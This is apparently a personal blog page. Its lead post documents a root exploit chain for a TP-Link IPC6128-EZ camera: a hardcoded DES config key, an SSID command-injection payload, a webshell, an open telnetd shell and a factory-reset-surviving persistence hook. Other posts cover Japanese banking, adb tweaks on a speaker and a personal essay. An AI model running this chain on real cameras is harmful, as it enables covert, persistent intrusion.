TP-Link IPC6128-EZ:从 config.bin 到持久化 Root Shell

本文记录了对 TP-Link TL-IPC6128-EZ 网络摄像头的完整安全研究过程:通过构造特殊的 config.bin 进入工厂测试模式,利用 PERF_TEST 模块的命令注入漏洞获取 shell,并通过 overlayfs hook 实现跨恢复出厂的持久化。

目标设备

  • 型号: TP-Link TL-IPC6128-EZ
  • SoC: ARM 32-bit, EABI5
  • 系统: Linux 4.19.91, uClibc 1.0.31
  • 文件系统: SquashFS rootfs(只读)+ UBIFS overlay(可写,持久化)
  • 核心进程: /bin/main 包含所有业务逻辑

0x01 固件分析

MTD 分区布局

mtd0: 2MB    factory_boot    引导加载器
mtd1: 2.5MB  factory_info    设备信息(MAC、硬件版本等)
mtd2: 1.5MB  art             应用配置(radio calibration)
mtd3: 2MB    config          设备配置(UBI 格式)
mtd4: 1MB    normal_boot     正常启动引导
mtd5: 6MB    kernel          Linux 内核
mtd6: 32MB   rootfs          SquashFS 根文件系统
mtd7: 80MB   rootfs_data     UBIFS overlay 数据
mtd8: 1MB    tp_header       TP-Link 固件头
mtd9-12: 128MB×4             AI 模型数据(人脸/人形/车牌检测等)

文件系统架构

设备使用经典的 OpenWrt overlayfs 方案:

/(overlayfs)
├── lowerdir = SquashFS rootfs(只读)
└── upperdir = /overlay/upper(UBIFS,可写)
    └── workdir = /overlay/work

/overlay/upper/ 中的文件会覆盖 rootfs 中的同名文件。这是持久化的关键。

启动流程

preinit → mount_root(挂载 UBIFS → fopivot 创建 overlayfs)
       → /sbin/init
       → /etc/init.d/rcS
           → S05boot
           → S10sysinit
           → S15monitor
           → S20main(启动 /bin/main)
           → S98*(自定义脚本在这里执行)

0x02 攻击面分析

SD 卡事件处理

/bin/main 监听 SD 卡插入事件,有三条处理路径:

路径函数触发条件守卫条件
PERF_TESTsd_onboarding_cbSD 卡插入 + factory_test_mode=1检查 factory_test_mode(非 “main already start”)
PLUGIN_MANAGEsd_plugin_ready_cbSD 卡有 plugin 文件“main already start” 全局标志
UPGRADEsd_upgrade_res_cbSD 卡有固件文件“main already start” 全局标志

PLUGIN_MANAGE 和 UPGRADE 都被 “main already start” 全局标志阻塞,main 启动后这个标志就被置位,无法绕过。

唯一可用的路径是 PERF_TEST,它检查的是 factory_test_mode 而非 “main already start”。

PERF_TEST 命令注入

sd_onboarding_cb(位于 0x22c744)的处理流程:

1. 检查 factory_test_mode == 1(从 /factory_info/factory_test_mode 读取)
2. 读取 SD 卡上的 config.txt
3. 解析 JSON 提取 ssid 和 password
4. url_decode(ssid) → snprintf(cmd, "... '%s' ...", ssid) → system(cmd)

关键反汇编(0x22c744 附近):

asm

; 读取 config.txt 中的 ssid
bl    url_decode          ; URL 解码 ssid
bl    snprintf            ; 格式化到命令字符串
                          ; cmd = "ubus call onboarding connect '{\"ssid\":\"<ssid>\", ...}'"
bl    system              ; 执行命令!

日志字符串 [PERF_TEST]cmd is %s 确认了 system() 调用的存在。

漏洞: ssid 字段经过 url_decode 后直接拼接到 shell 命令中,没有任何过滤或转义。通过在 ssid 中注入 shell 元字符,可以执行任意命令。

0x03 进入工厂测试模式

config.bin 格式

设备的配置文件 config.bin 使用 DES-CBC 加密:

  • 算法: DES-CBC
  • 密钥: D30474E282B5A282(从二进制中提取)
  • IV: 全零
  • 内部格式: 自定义二进制容器,包含多个配置节点,每个节点是压缩的 JSON

构造 factory_test_mode config.bin

流程:

# 1. 从 Web UI 下载当前配置备份
#    浏览器打开 http://<摄像头IP> → 系统设置 → 备份配置

# 2. 修改配置,启用 factory_test_mode
python3 build_config_bin.py set config_backup.bin config_ftm.bin \
    --kv 'factory_info.factory_test_mode.factory_test_mode.enabled=1'

# 3. 通过 Web UI 上传修改后的 config_ftm.bin
#    系统设置 → 恢复配置 → 选择 config_ftm.bin

上传后设备重启,进入工厂测试模式。此时:

  • 所有模块进入工厂状态
  • OSD 不显示
  • LED 闪红灯
  • PERF_TEST 路径被激活

建议使用从同一台设备当前状态导出的备份作为基础。使用其他设备或旧版本的配置可能导致设备无响应。

0x04 命令注入获取 Shell

准备 SD 卡

SD 卡根目录需要三个文件:

/sdcard/
├── config.txt          # 命令注入 payload
├── busybox_arm32       # 静态编译的 busybox(ARM32)
└── s.sh                # 部署脚本

config.txt —— 注入 payload

{
  "ssid": "x';sh /tmp/sdcard/s.sh;echo '",
  "password": "x"
}

sd_onboarding_cb 处理这个 ssid 时,实际执行的命令变成:

ubus call onboarding connect '{"ssid":"x';sh /tmp/sdcard/s.sh;echo '", "password":"x"}'

分解一下:

  1. ubus call onboarding connect '{"ssid":"x' — ubus 命令,ssid 部分被截断
  2. ;sh /tmp/sdcard/s.sh;注入的命令
  3. echo '", "password":"x"}' — 消化剩余字符串,避免语法错误

绕过”保护环境”

设备的 /bin/ash 有命令白名单,大部分命令会返回 "cmd not supported under protected environment"。绕过方法:

# 用 busybox_full 创建一个不受限制的 ash
BB="/overlay/upper/bin/busybox_full"
ln -sf "$BB" /tmp/ash

# 在不受限制的 ash 上启动 telnetd
"$BB" telnetd -l /tmp/ash -p 4445 -b 0.0.0.0

端口 4445 上的 telnet 会话使用 busybox 自带的 ash,不受保护环境限制。

0x05 部署脚本详解

s.sh 是 PERF_TEST 注入后自动执行的核心脚本,完成以下任务:

Phase 1: 部署 Shell 到 Overlay

# Busybox
mkdir -p /overlay/upper/bin
cp /tmp/sdcard/busybox_arm32 /overlay/upper/bin/busybox_full
chmod 755 /overlay/upper/bin/busybox_full

# CGI Webshell(通过 HTTP 执行命令)
mkdir -p /overlay/upper/www/cgi-bin
cat > /overlay/upper/www/cgi-bin/sh << 'CGI'
#!/bin/ash
echo "Content-Type: text/plain"; echo ""
CMD=$(echo "$QUERY_STRING" | sed -n 's/.*cmd=\([^&]*\).*/\1/p')
# ... URL 解码 + eval 执行 ...
CGI

# 开机自启脚本(S98remote)
cat > /overlay/upper/etc/init.d/remote << 'INIT'
#!/bin/ash /etc/rc.common
START=98
start() {
    BB="/overlay/upper/bin/busybox_full"
    ln -sf "$BB" /tmp/ash
    "$BB" telnetd -l /tmp/ash -p 4445 -b 0.0.0.0
    "$BB" httpd -p 8888 -h /overlay/upper/www
}
INIT
ln -sf ../init.d/remote /overlay/upper/etc/rc.d/S98remote

写入 /overlay/upper/ 的文件通过 overlayfs 覆盖 rootfs,重启后依然存在。

Phase 2: 连接 Wi-Fi

工厂模式下 Wi-Fi 驱动已加载(PERF_TEST 本身就需要测试 Wi-Fi),但注入破坏了原始的 onboarding 命令。脚本用正确的凭据重新连接:

ubus call onboarding connect '{"ssid":"OOXX", "password":"12345678"}'

Phase 3: 启动服务

BB="/overlay/upper/bin/busybox_full"
ln -sf "$BB" /tmp/ash
"$BB" telnetd -l /tmp/ash -p 4445 -b 0.0.0.0   # 无限制 shell
"$BB" httpd -p 8888 -h /overlay/upper/www         # webshell

部署完成后,连接:

telnet <摄像头IP> 4445
# 或浏览器访问 http://<摄像头IP>:8888/cgi-bin/sh?cmd=id

0x06 持久化:自愈 Hook

问题

Shell 部署在 /overlay/upper/ 中,正常重启时会保留。但恢复出厂设置会清空 /overlay/upper/

# /hooks/post_reset_hook.sh(rootfs 中的原始版本)
#!/bin/sh
if [ -d "/overlay" ]; then
    cd /overlay
    rm -rf `ls | grep -v "plugins"`
fi

注意:plugins/ 目录被保留(grep -v "plugins"),因为里面存放 AI 模型文件。

解决方案:Hook 劫持

通过 overlayfs 覆盖 post_reset_hook.sh,让恢复出厂设置时自动恢复 shell 文件。

关键前提验证(通过反汇编确认):

/bin/main0x23a418 处调用 hook:

0x23a418:  push  {r4, lr}
0x23a41c:  bl    0x23a318          ; config_recovery(重置配置)
0x23a420:  cmn   r0, #1
0x23a424:  popeq {r4, pc}          ; 不需要重置则返回
0x23a42c:  ldr   r0, "/hooks/post_reset_hook.sh"
0x23a430:  bl    access@plt        ; 检查文件是否存在
0x23a440:  bl    system@plt        ; 执行 hook
0x23a448:  b     reboot@plt        ; 重启

关键事实:

  1. Hook 由 main运行时调用,此时 overlayfs 已挂载
  2. system("/hooks/post_reset_hook.sh") 通过 overlayfs 解析路径
  3. 我们在 /overlay/upper/hooks/ 的文件会优先于 rootfs 中的原版
  4. Hook 执行完毕后才调用 reboot()

实现

Step 1: 备份到 plugins/(恢复出厂不删除)

mkdir -p /overlay/plugins/shell_backup/restore/{bin,etc/init.d,www/cgi-bin,hooks}

cp /overlay/upper/bin/busybox_full      /overlay/plugins/shell_backup/restore/bin/
cp /overlay/upper/etc/init.d/remote     /overlay/plugins/shell_backup/restore/etc/init.d/
cp /overlay/upper/www/cgi-bin/sh        /overlay/plugins/shell_backup/restore/www/cgi-bin/

# 权限恢复脚本
cat > /overlay/plugins/shell_backup/restore/fix_links.sh << 'EOF'
#!/bin/ash
mkdir -p /overlay/upper/etc/rc.d
ln -sf ../init.d/remote /overlay/upper/etc/rc.d/S98remote
chmod 755 /overlay/upper/bin/busybox_full
chmod 755 /overlay/upper/etc/init.d/remote
chmod 755 /overlay/upper/www/cgi-bin/sh
EOF

Step 2: 覆盖 post_reset_hook.sh

mkdir -p /overlay/upper/hooks
cat > /overlay/upper/hooks/post_reset_hook.sh << 'HOOK'
#!/bin/sh
RESTORE_SRC="/overlay/plugins/shell_backup/restore"

if [ -d "/overlay" ]; then
    cd /overlay

    # 原始行为:删除除 plugins/ 以外的一切
    rm -rf $(ls | grep -v "plugins")

    # 自愈:从 plugins/ 恢复 shell
    if [ -d "$RESTORE_SRC" ]; then
        mkdir -p /overlay/upper
        cp -r ${RESTORE_SRC}/bin /overlay/upper/
        cp -r ${RESTORE_SRC}/etc /overlay/upper/
        cp -r ${RESTORE_SRC}/www /overlay/upper/
        cp -r ${RESTORE_SRC}/hooks /overlay/upper/
        sh ${RESTORE_SRC}/fix_links.sh 2>/dev/null
        mkdir -p /overlay/work/work
    fi
fi
HOOK
chmod 755 /overlay/upper/hooks/post_reset_hook.sh

工作流程

用户按 Reset 按钮
    ↓
main 检测到 GPIO 事件
    ↓
config_recovery() — 重置所有配置(factory_test_mode → 0)
    ↓
system("/hooks/post_reset_hook.sh") — 执行我们的版本!
    ↓
rm -rf upper/ work/     — 清理(hook 自身也被删除,但已在内存中)
    ↓
cp -r plugins/restore/* → upper/  — 恢复 shell 文件
    ↓
reboot()
    ↓
设备启动:正常模式 + shell

Hook 自身也被复制回 upper/hooks/,因此后续的恢复出厂设置也会自愈——无限循环持久化

0x07 完整攻击流程总结

┌───────────────────────────┐
│  1. 从 Web UI 下载 config.bin 备份                   │
│  2. 修改 factory_test_mode.enabled = 1               │
│  3. 上传修改后的 config.bin → 设备进入工厂模式      │
├───────────────────────────┤
│  4. 准备 SD 卡:config.txt + busybox + s.sh          │
│  5. 插入 SD 卡 → PERF_TEST 触发命令注入             │
│  6. s.sh 自动部署 shell + 安装自愈 hook              │
├───────────────────────────┤
│  7. 按 Reset 按钮恢复出厂                            │
│  8. 自愈 hook 自动恢复 shell                         │
│  9. 设备回到正常模式,shell 完好                     │
│ 10. 重新配对摄像头,完成                             │
└───────────────────────────┘

0x08 踩坑记录

ubus 在工厂模式下为空

工厂模式下 main 的所有模块进入工厂状态,ubus 服务注册被跳过。因此无法通过 ubus 命令退出工厂模式。

factory_test_mode 存储位置

factory_test_mode 通过 /dev/slp_flash_chrdev(专有内核驱动,ioctl 接口)存储,不在标准 MTD/UBI 设备中。无法通过 dd 或 mount 直接修改。只有 config_recovery(恢复出厂)能将其重置为 0。

0x09 POC

拆解 TP-Link 监控摄像头设置备份文件 config.bin 的格式

因为各种原因,手上有一个中国大陆版的 TL-IPC6128-EZ,tplink为了不让用戶將它拿去其他国家用,可谓是下了真功夫。

其中最坑的就是OSD的水印时间是写死的中国大陆时区CST-8。

除了手动设定时间、搭建一个做过手脚的ntp伺服器以外,我选择看看机器备份档config.bin是否包含时区信息,于是有了这篇文章。(剧透:有时区信息,但是改了也没用)

整个过程踩了不少坑,记录下来。

1. 整体结构

config.bin
├─ [0x00:0x10] MD5(ciphertext)               ← 唯一的明文头
└─ [0x10:EOF ] DES-CBC( 外层明文 )           ← 单 DES,key 来自设备encrypt_key,IV=0
     ├─ 0x000 TP_HEAD(0x18) + vendor_id/zone_code + 长度字段
     ├─ 0x200 顶层 NVMP-CONFIG 容器:magic + product_id + datalen
                config_file_head:
                +0x00  "NVMP-CONFIG\0" // 12 字节 magic
                +0x10  product_id  u32 BE // product_id
                +0x14  datalen     u32 BE // 其后所有节点字节数
     └─ 0x218 配置节点(node)
          ├─ +0x10 count(LE)  // JSON 条目数
          ├─ +0x14 clen(LE)   // zlib 压缩流长度
          ├─ +0x18 ulen(LE)   // 解压后长度
          └─ +0x1c body = DES-CBC( zlib( item0\0 item1\0 … ) ) // 内层再一层 DES + zlib

外层与内层各有一层 DES(同 key、同 IV=0),内层 DES 之内再套 zlib,zlib 之内是一串 NUL 分隔的 JSON 配置表。加密为单 DES,非 AES

key不知道是不是统一的,我这个型号的key是:D30474E282B5A282

2. 加密:单 DES

/bin/main 内含 AES_cbc_Decrypt_no_paddingAES256-CBC 等符号,但与 config.bin 无关:AES_cbc_Decrypt_no_padding0x2f339c)全程序仅一个调用者,其上下文皆为 password、socket、RTSP 字符串,猜测是tplink云平台相关的东西。

config.bin 的解密路径为 uc_post_handle → 0x32b548 → 0x32b26c

0x32b26c:
  读取 /tmp/base-files/etc/encrypt_key
  这是一个16 个十六进制字符,比如我手上这台是D30474E282B5A282
  hex_str_to_bytes(dst, key_str, 8)      → 转换成 8 字节 DES 密钥
  密钥核心 0x30137c / 0x3013dc:
       bic r3, r3, #7      ; 长度向下取整到 8 的倍数
       … 每轮步进 #8 …      ; 8 字节一组分组

同一把 key、同一个 IV=0 同时用于外层文件内层节点 body 两处 DES。加解密为同一函数 0x32b26cmode 参数:0x32b540(mode=0) 为加密、0x32b548(mode=1) 为解密。

3. 外层明文布局

偏移相对明文起点(= 文件偏移 − 0x10):

+0x000  TP_HEAD (0x18)
          +0x00  00 00 01 00
          +0x04  20 字节签名            ← 和设备 /tp_header 比对
+0x020  vendor_id   u16 LE
+0x022  zone_code   u16 LE
+0x040  len_head    u32 BE
+0x044  len_data    u32 BE              ← 校验:filelen ≥ len_head + len_data
+0x200  config_file_head:
          +0x00  "NVMP-CONFIG\0"        12 字节 magic
          +0x10  product_id  u32 BE     (= 设备 product_id)
          +0x14  datalen     u32 BE     (其后所有节点字节数)
+0x218  第一个配置节点

除开头 16 字节的 MD5 外,所有字段(含 product_id、TP_HEAD 签名)皆位于 DES 解密后的明文内,文件表面不可见。实测本机 product_id = 61281 (0xEF61)vendor_id = 0zone_code = 0

4. 内层:NVMP 配置节点

逆向自 parse_config (0x32c514),并以真机数据交叉验证。

4.1 节点头(28 字节,0x218 起)

+0x00  "NVMP-CONFIG\0"          12 字节
+0x0c  flag                      通常 00 00 00 01 (BE 1)
+0x10  count   u32 LE            JSON 条目数     (实测 165)
+0x14  clen    u32 LE            zlib 压缩流长度 (实测 9583,未补齐)
+0x18  ulen    u32 LE            解压后字节数    (实测 120431)
+0x1c  body

注意端序:节点头的 count/clen/ulen小端,而顶层容器的 product_id/datalen大端,同文件混用Orz。

4.2 body 的三层解码

body(磁盘上,补齐到 8 字节)
  ── DES-CBC 解密 // 以 78 DA 开头的 zlib 流
  ── zlib 解压    // 120431 字节明文
  ── 按 \0 切分   // 165 段紧凑 JSON

每段为一张配置表,例如:

{"system":{"system":{"sys":{"dev_alias":"%e9%81%93%e8%b7%afA","timezone":"CST-8"}}}}
{"image":{"para":{"common":{"luma":"50","contrast":"50"}}}}

特征:值几乎皆为字符串(含数字、布尔);中文等经 URL 百分号编码;顶层键可重复(多条 systemimage),须以保序列表处理,不可合并为单一字典;count 等于条目数,切分时丢弃尾部空段。

这里出现了时区,但是实测修改这个值并没有任何卵用,OSD时间不遵循这个时区设定,tplink 煞笔。

4.3 写回时的长度字段重算

comp       = zlib(blob, level=9)
clen       = len(comp)          # 未补齐
body       = DES(comp 补齐到 8)
datalen    = 28 + len(body)     # 顶层容器,大端
ulen       = len(blob)
count      = len(items)
外层       = 头部[:0x218] + 节点;补齐 8 字节,重算 len_head/len_data,外层 DES + MD5

5. 服务端校验:uc_post_handle

HTTP 路由 /admin/system/upload_conf 对应处理函数 0x210420。逆向之后得到校验顺序:

context 非空 
↓
MD5(file[16:]) == file[0:16]↓
DES-CBC 解密成功 
↓
总长 ≥ BE32(@0x40) + BE32(@0x44)↓
明文长度 > 0x200(config_file_head 有效) 
↓
BE32(@0x210) == 设备 product_id↓
TP_HEAD[0x04:0x18] 匹配 && vendor_id 匹配 && zone_code 匹配 
↓
parse_config 成功

全数通过后进入成功分支(0x210634 → msg_send(0x5014))应用配置。

负责落盘的函数(~0x291f80)实际调用:

  • fopen/fwrite → 写 /tmp/base-files/etc/hardware.config(及 /tmp/hardware.config)
  • fopen/fwrite → 写 /tmp/app_config.bin
  • system() ×2 → 执行(逐字命中固件内字符串):
    • mkdir -p /tmp/base-files/etc/;
    • tar -zxvf /tmp/app_config.bin -C /tmp/;rm -rf /tmp/app_config.bin;chmod -R 777 /tmp/base-files;chmod -R 777 /tmp/radio; // tplink非常风骚的操作,这里可以构造一个带路径穿越的tar.gz包,直接覆盖任意文件

用ai写的config.bin参数值修改、打包工具

使用说明

一、 基础准备

在运行脚本之前,你需要确保环境满足以下要求:

  1. 健康的大脑
  2. Python 3。
  3. 安装依赖库: 该脚本需要 pycryptodome 库来进行 DES 解密。
    不懂去问AI

二、大概流程

如果你想修改摄像头的某个功能参数(比如修改网络设置、账号等),最标准的流程是:导出 → 修改 → 校验 → 导入

第一步:导出当前配置为 JSON

首先,你需要从设备上获取一份原始的 config.bin 文件。 使用 export 命令将其转换为人类可读的 JSON 文件:

bashpython build_config_bin.py export config.bin config.json

会得到一个 config.json 文件,里面包含了所有的配置项。

第二步:修改 JSON 文件

手动打开 config.json,找到你想修改的参数进行编辑。

第三步:将修改后的 JSON 导入并生成新文件

使用 import 命令。这里需要原始的 config.bin 作为模板,因为它包含了设备唯一的硬件标识(如 product_id, vendor_id 等)。

bashpython build_config_bin.py import config.bin config.json new_config.bin

新构造的文件在同目录下 new_config.bin

第四步:校验文件

先本地检查一下可不可以通过固件检查:

bashpython build_config_bin.py verify new_config.bin

结果:如果看到 全部通过,说明文件格式本身合法,大概率可以上传成功(摄像头可以轻松变砖 笑)。


三、 其他功能

除了上述标准流程,脚本还提供了一些快捷工具:

1. 快速修改

如果你只需要改一个简单的字符串参数,可以使用 set 命令直接在二进制文件上操作:

bash# 假设你要把某个路径下的 key 改为 "new_value"
python build_config_bin.py set config.bin output.bin --kv "path.to.key=new_value"

2. 跨设备适配(重建配置)

如果你有一份 A 设备的配置,想把它的内容搬到 B 设备上,可以使用 rebuild。它会保留 A 设备的配置内容,但把 B 设备的硬件 ID 填入头部:

bashpython build_config_bin.py rebuild template.bin output.bin --product-id 61281 --vendor-id 0 --zone-code 0

3. 查看内部结构

可以使用 nodes 命令查看配置里有哪些节点:

bashpython build_config_bin.py nodes config.bin

这会列出所有的 NVMP 节点、类型(JSON 还是二进制数据)以及它们在文件中的位置。

4. 提取特定内容

如果你只需要提取某一部分(比如提取出里面的 app_config 压缩包):

bashpython build_config_bin.py extract config.bin 0 some_data.bin

注:0 是节点序号,可以在 nodes 命令中查看。

5. 基础解密/加密

如果你只是想单纯地把文件转换成明文或加密回二进制:

  • 解密python build_config_bin.py decrypt config.bin plaintext.txt
  • 加密python build_config_bin.py encrypt plaintext.txt config.bin

重要提示

DES Key:硬编码了 DES 解密密钥(D30474E282B5A282),不确定其他型号可不可以用。

备份:在操作任何 config.bin 之前,请务必保留原始文件的备份。

硬件匹配:除非你非常清楚自己在做什么,否则不要在不同型号的摄像头之间随意混用 config.bin,这可能导致设备变砖。

不提供任何保证。

在日本,可以使用通稱名開戶的銀行

2025年1月12日追記 関西ろうきん

本文討論前提:非日本籍、非永住,有在留卡,通稱名經過役所登錄,打印住民票的中可以確認到通稱名。且是新規開設口座,暫時不討論將已有口座名義變更到通稱名的情況。

簡短結論:四大行中選みずほ銀行,小众银行选SBJ銀行

繼續閱讀 在日本,可以使用通稱名開戶的銀行

日本国内送金でチャールズ・シュワブ国際投資口座に入金する方法

ご注意:三井住友銀行の手数料規定変更に伴い本文が紹介した方法が失効になりました、ご了承を。(2024年末)

チャールズ・シュワブ(Charles Schwab)の公式入金ガイドでは、シティバンク(Citi Bank)の支店にあるシュワブの受取口座に資金を送金するために、高い手数料がかかられる海外送金って方法のみになっている。 繼續閱讀 日本国内送金でチャールズ・シュワブ国際投資口座に入金する方法

使用日本國内匯款方式入金Charles Schwab International投資賬戶

2024年末更新:本文阐述的方法由于三井住友的规则和手续费修改,已经失效,本文已经没有意义。

下面是当时的原文:

前略。

Schwab給出的官方入金指引要求使用手續費高昂的海外送金(International Wire)方式給Schwab在花旗銀行(Citi Bank)的各地分行開設的收款賬戶轉賬入款。 繼續閱讀 使用日本國内匯款方式入金Charles Schwab International投資賬戶

斐訊R1智障音箱通過adb調試介面安裝apk實現AirPlay和DLNA功能

2025年9月6日更新:感謝網友haha推薦反饋,藍莓投屏比樂播投屏更好用一些。傳送門

因為揀垃圾是一件很快樂的事情,一年前(2019年)我特意從中國大陸的網站上購買了很多斐訊遺產,其中就包括斐訊R1音箱,通過重重困難飄洋過海轉運到了日本。

剛剛拿到手的R1音箱是沒有拆封的,不同時期生產的R1音箱,內置的韌體(ROM)版本是不一樣的,舊版本的韌體音質校準不是特別理想,需要通過DNS劫持、push工廠配置文件等等的方法升級到最新版本,網絡上有很多教程,有需要的人可以Google一下,應該馬上就可以找到。

廢話不多說,下面是正題:

如何通過adb調試介面安裝App?

首先要找到斐訊R1音箱的IP位址。

有很多方法,比如查看路由器的DHCP分配位址表:

Host Name是「Phicomm_R1」開頭的就是斐訊R1音箱

知道斐訊R1的IP位址之後,用adb連接它!

OX-Macbook:~ ox$ adb connect 192.168.0.40
connected to 192.168.0.40:5555

然後用adb push命令把需要安裝的apk推送到音箱上:

adb push [apk文件所在的本地路徑] /data/local/tmp/

// 比如這樣:
// adb push /Users/ox/Desktop/airplay.apk /data/local/tmp/

然後通過調用pm工具安裝剛才push的apk安裝包:

adb shell /system/bin/pm install -t /data/local/tmp/[文件名]
額外提醒

如果你不知道轉義字符是什麼東西,那你的文件名最好不要有奇怪的字符,比如空格和括號之類的。

安裝AirPlay接收端

「樂播投屏TV版」和「AirPin」還有「Media Center」我都在用。

AirPin 是收費的App,但是也有免費的版本(AirPin Lite),在R1上用的話已經足夠了。

樂播投屏TV版 是免費的App,但是會上傳MAC地址之類的隱私內容,有時候還會擅自更新,新版本的樂播投屏TV版每次新設備連接都需要點擊允許,沒有屏幕的R1音箱就只能通過scrcpy之類的工具連接到R1之後手動點擊允許,非常麻煩,介意的話可以安裝舊版本的同時在路由器上屏蔽樂播投屏的服務器(*.hpplay.cn)。

Media Center 是免費的App,不過似乎穩定性不是特別好,但是非常輕量。

安裝DLNA接受端

上面提到的三個Apps都支援DLNA功能,自己選一個用吧。

使用scrcpy操作R1音箱的UI介面

雖然用adb調試介面可以完成大多數操作,但是比如像更改AirPlay的顯示名稱之類的操作,還是需要GUI操作,因為R1沒有屏幕,所以需要用到一些可以遠端操作Android GUI介面的工具,比如scrcpy。

scrcpy的GitHub倉庫地址:https://github.com/Genymobile/scrcpy

Windows版本在這裏可以找到。

Linux和macOS可以通過包管理器很方便地安裝,具體參考這裏

使用方法極其簡單:以macOS為例,先用adb connect命令連接到R1音箱之後,再執行scrcpy就可以了。

比如像這樣:

OX-MacBook:~ ox$ adb connect 192.168.0.40
connected to 192.168.0.40:5555
OX-Macbook:~ ox$ scrcpy
使用scrapy連接斐訊R1音箱
更改Media Center的設備顯示名稱
打開Media Center的AirPlay功能和設定R1音箱啟動後自動打開AirPlay伺服器

三款App的下載地址

樂播投屏TV版舊版本:Download

AirPin Lite:Download

Media Center:Download

斐讯 R1 音箱關閉開機提示音

斐訊倒閉了,R1音箱早就不能正常用了。
前段時間有大神出了一個刷機的方案,但是要拆機自己焊接端口,比較麻煩,我只需要能播AirPlay就可以了,所以就沒有動力去拆機。
但是每次開機的那個提示音很吵很煩,有時候莫名其妙還會喚醒智障小訊,一直在想能不能把斐訊全家桶幹掉。
但是一直沒有出不拆機就能root的方案。
終於。今天晚上無聊,自己摸索出解決方案,開機再也沒有煩人的提示音,叫它也不會再應答,符合我自己的使用場景,現在把方法分享出來,其實核心內容很簡單,就是通過adb調用pm命令把斐訊全家桶hide掉就可以了。

下面是具體方法

先用斐訊AI的App讓R1連上Wi-Fi,然後找到R1的IP地址,然後

adb connect [R1 IP地址]

然後運行下面的命令

adb shell /system/bin/pm hide com.phicomm.speaker.productiontest
adb shell /system/bin/pm hide com.phicomm.speaker.bugreport
adb shell /system/bin/pm hide com.phicomm.speaker.otaservice
adb shell /system/bin/pm hide com.phicomm.speaker.player
adb shell /system/bin/pm hide com.phicomm.speaker.device

需要留意的是,com.phicomm.speaker.launcher 不可以hide掉,不然頂部的音量調節功能會失效。另外,為了讓開機的音效消失,需要把com.phicomm.speaker.device禁用,但是這樣按三下頂部按鈕開啟藍牙的功能就會失效

雖然隨時都可以通過执行adb shell /system/bin/pm unhide com.phicomm.speaker.device命令恢复蓝牙的功能,但是每次这个app启动,都会有很震耳的音效,每次执行命令之前都要注意R1的音量大小。

然後重新啟動就可以了:

adb shell reboot

想復原的話,只需要將命令的hide改為unhide,就可以了,如果部分功能还是没有恢复,可能需要重启。比如像這樣:

adb shell /system/bin/pm unhide com.phicomm.speaker.productiontest
adb shell /system/bin/pm unhide com.phicomm.speaker.bugreport
adb shell /system/bin/pm unhide com.phicomm.speaker.otaservice
adb shell /system/bin/pm unhide com.phicomm.speaker.player
adb shell /system/bin/pm unhide com.phicomm.speaker.device
// 重启的命令:
adb shell reboot

題外話

如果想乾脆一點,可以用/system/bin/pm uninstall --user 0 命令把上面的全家桶徹底刪掉,但是這個操作不可恢復,特別是com.phicomm.speaker.otaservice 如果徹底幹掉的話,想刷機就只能拆開,手工焊接上調試端口刷機了。

寫在2019年年末

「2019年瞬間就結束了。」

人隨著年齡的增長,主觀上會慢慢地感到時間變快了。而我現正經歷這個變化過程,且是感受最強烈的階段。

認真回顧2019年——我做了些什麼事情,身邊發生了什麼事情?其實想說的事情有很多,無奈近年記憶力衰退得誇張,有些事情到底是否2019年發生的也不能肯定,某件事情具體是哪個月份發生的,現在的我其實也不特別在意,但其實是想要記起也記不清楚,只好「強迫」自己不去在意。雖也可以通過各種線索推導出相對正確的結果,但其實也並無這個必要。雖我有時候確忍不住在意這種細微事情,但現在單是要將這些事情整理出來就已要耗費我大量精力,而我現在其實並沒有太多這樣的精力。事情確是發生過,這一點是不會有錯的。

應該是年初,被一個患有憂鬱症的女生單方面絕交。這個事情其實對我打擊頗大,我因為這件事情,又一次開始審視自己的人際關係原則:

我開始思考,我這種「來者不拒」的社交原則是不是有很大的問題,在實踐中,出現的最尖銳的矛盾就是我肯定並不能真的做到「來者不拒」,這也是理所當然。每個人都是有底線的,精力也有限度,當然忍耐力亦然。

因為「來者不拒」就意味我需要將我的精力不斷地透支、不平均地分配給我身邊的人。這對於我本人並沒有實質上的好處,我之所以堅持這麼多年,主要原因是我內心深處善良,而維持這種善良所需的虛榮心也和我付出的額外成本「收支平衡」,我知道社會上每個人都是不平等的,有人就是會有各種各樣的原因,讓他會被周圍人孤立,這種原因有時候可以很具體,亦有時候無論是他自己,或是孤立他的人都說不清楚;這種原因可以是先天的,事出有因的甚至也可以是表面上「平白無故」的,但很多時候當事人都無法通過一般的努力克服這種不利因素,結果就是他們會被很多人孤立。只是單純孤立的行為,其實無可厚非,但是終究我個人是不支持的,所以我希望我也可以用自己的實際行動貫徹我自己的理念,所以我刻意地要求自己做到相比其他人更加公平地照顧到身邊的每一個人,對於被孤立的人,我更是想要撥出有限且不多的精力與他們共享。

我的交友原則是不想孤立任何人。

雖然我經常感到疲憊,但是直到這件事發生前,總體上我算是能夠「收支平衡」,我透支了精力,但是我收穫了我期望的內心上的滿足,我滿足了自己的道德期望。我的同理心使我站在道德高點無時無刻地審視自己的行為,而虛榮心填補了我透支的精力。

本來這套系統本可以持續不斷地運行,就如《道德情操論》所說描述的一樣。

結果這個事件的發生,正正破壞了保證這個系統能夠維持下去最重要的兩部分的其中一部分,我非但沒能滿足虛榮心,我獲得虛榮心的其中一個重要途徑更被破壞——需要花時間建立的外在良好形象被污名化。

對方集中火力攻擊我的品格,而具體的理據當然是站不住腳的,身邊熟悉我的人對我品格認知也自然不會因為她的控訴而動搖。

但現實是:外在形象並不是以你週邊幾個人對你的認識而形成的,更多的是不熟悉你的人,甚至沒有見過面的人來定義的。謠言以我的個人能力無法控制,儘管我想要嘗試掌控局面。我也不知道結果怎樣,但是我敢肯定我的形象一定因此受損了。這很遺憾。

而她也損失了我本人本會在未來繼續分享給她的精力,這些「精力」對於她來說,本應該是最珍貴的人生財富,但是很可惜,她因為不受控制的病態精神狀況和偏執人格障礙將她自己逼到了絕境,將這些付諸東流。

我從這個事件中收穫了教訓:我付出的氾濫的同理心回報不總是能如我所望獲得等額或更多的虛榮心回報,這項投資不保本,更可能蝕大本。

違反社會規則,人為地過度干預市場風險很高,儘管願景是好的,但就和共產主義一樣,期望的理想社會在現實中怎麼可能可以維持長久?


另外一個教訓就是對於抑鬱症患者,在交際過程中需要非常小心注意,保持相當的距離是非常重要的,留意對方有沒有按時按量服藥也很重要。

對嘗試通過自殺・自殘博得關注和同情的病人更是不能陷入他們創造的陷阱,敦促他們按時按量服藥,催促他們去心理門診獲得專業的醫療意見是我目前認為的作為普通人的唯一正確做法。在必要的時候給予最低限度的生命保護,作為普通人即可問之無愧。

